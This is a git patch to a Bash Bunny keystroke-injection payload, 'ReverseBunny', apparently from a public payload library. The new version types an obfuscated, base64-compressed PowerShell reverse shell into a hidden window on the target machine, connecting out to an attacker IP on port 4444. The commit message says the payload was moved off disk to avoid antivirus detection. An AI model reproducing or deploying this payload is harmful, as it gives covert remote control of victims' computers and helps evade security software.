From da3c27ddea27bf89e168d2c71517650abe79e2fa Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Mon, 29 Nov 2021 17:52:03 +0100 Subject: [PATCH] Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design --- .../remote_access/ReverseBunny/payload.txt | 67 ++++++++----------- 1 file changed, 29 insertions(+), 38 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 945fac51..d0b85c3a 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -3,53 +3,44 @@ # Title: ReverseBunny # Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.1 +# Version: 1.2 # Category: Remote_Access -# Attackmodes: HID, Storage +# Attackmodes: HID LED SETUP -GET SWITCH_POSITION +#GET SWITCH_POSITION DUCKY_LANG de -rm /root/udisk/DONE - -ATTACKMODE HID STORAGE - -#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING - -LED STAGE1 +ATTACKMODE HID +#WAIT_FOR_PRESENT Your_Device DELAY 5000 -RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass" -DELAY 6000 +Q GUI r +DELAY 5000 +Q STRING "powershell -NoP -NonI -W hidden" +DELAY 5000 +Q ENTER -Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))" -DELAY 10000 -Q ENTER -DELAY 10000 -Q CONTROL v -DELAY 10000 -Q ENTER DELAY 1000 - -LED STAGE2 - -until [ -f /root/udisk/DONE ] - do - sleep 0.2 -done - -LED CLEANUP - -rm /root/udisk/DONE - -DELAY 100 - -sync - -DELAY 100 +Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I" +DELAY 1000 +Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH" +DELAY 1000 +Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R" +DELAY 1000 +Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ" +DELAY 1000 +Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf" +DELAY 1000 +Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN" +DELAY 1000 +Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ" +DELAY 1000 +Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp" +DELAY 1000 +Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )" +DELAY 1000 +Q ENTER LED FINISH - -#SAVE TO EJECT